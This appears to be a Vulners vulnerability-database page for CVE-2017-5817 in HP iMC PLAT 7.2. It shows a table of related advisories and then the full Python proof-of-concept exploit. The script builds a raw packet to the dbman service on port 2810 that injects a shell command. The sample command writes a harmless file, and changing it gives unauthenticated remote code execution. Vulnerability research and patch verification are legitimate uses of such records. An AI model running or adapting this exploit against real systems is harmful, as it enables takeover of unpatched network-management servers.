Vulners
Lucene search
HP iMC Plat 7.2 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | HP iMC Plat 7.2 - Remote Code Execution Exploit | 2 Dec 201700:00 | – | zdt |
| HPE iMC dbman RestoreDBase Unauthenticated Remote Command Execution Exploit | 10 Jan 201800:00 | – | zdt |
 | CVE-2017-5817 | 28 Nov 201700:00 | – | circl |
 | HPE Intelligent Management Center PLAT Arbitrary Code Execution Vulnerability (CNVD-2017-07185) | 18 May 201700:00 | – | cnvd |
 | HPE Intelligent Management Center dbman RestoreDBase Command Injection (CVE-2017-5817; CVE-2017-5819) | 15 Aug 201700:00 | – | checkpoint_advisories |
 | CVE-2017-5817 | 15 Feb 201822:00 | – | cve |
 | CVE-2017-5817 | 15 Feb 201822:00 | – | cvelist |
 | HPE iMC - dbman 'RestoreDBase' Remote Command Execution (Metasploit) | 10 Jan 201800:00 | – | exploitdb |
 | HP iMC Plat 7.2 - Remote Code Execution | 28 Nov 201700:00 | – | exploitpack |
 | H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities | 19 Jun 201700:00 | – | nessus |
10
#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE
# Date: 11-28-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5817
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-341/
# note that this PoC will create a file 'C:\poc.txt'
import socket, sys
ip = '192.168.1.74'
port = 2810
command = "echo PoC 12345 > C:\\poc.txt" # command to run
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
buf = "\x00\x00\x27\x17\x00\x00\x00"
buf += chr(109 + 10 + len(command))
buf += "\x30\x81"
buf += chr(109 + 7 + len(command))
buf += "\x04\x0c"
buf += ip
buf += ("\x04\x04\x41\x41\x41\x41\x04"
"\x04\x42\x42\x42\x42\x04\x04\x43\x43\x43\x43\x02\x01\x01\x02\x01"
"\x03\x04\x06\x4d\x41\x4e\x55\x41\x4c\x04\x04\x44\x44\x44\x44\x04")
buf += chr(len(command) + 7)
buf += "\x73\x61\x22\x26\x20"
buf += command
buf += ("\x20\x26\x04\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x04"
"\x04\x00\x00\x04\x57\x04\x08\x69\x6e\x73\x74\x61\x6e\x63\x65\x04"
"\x04\x45\x45\x45\x45\x04\x04\x46\x46\x46\x46\x04\x04\x47\x47\x47"
"\x47\x04\x04\x48\x48\x48\x48\x30\x00\x02\x01\x01")
sock.send(buf)
sock.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2017 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 39.8
CVSS 210
EPSS0.82548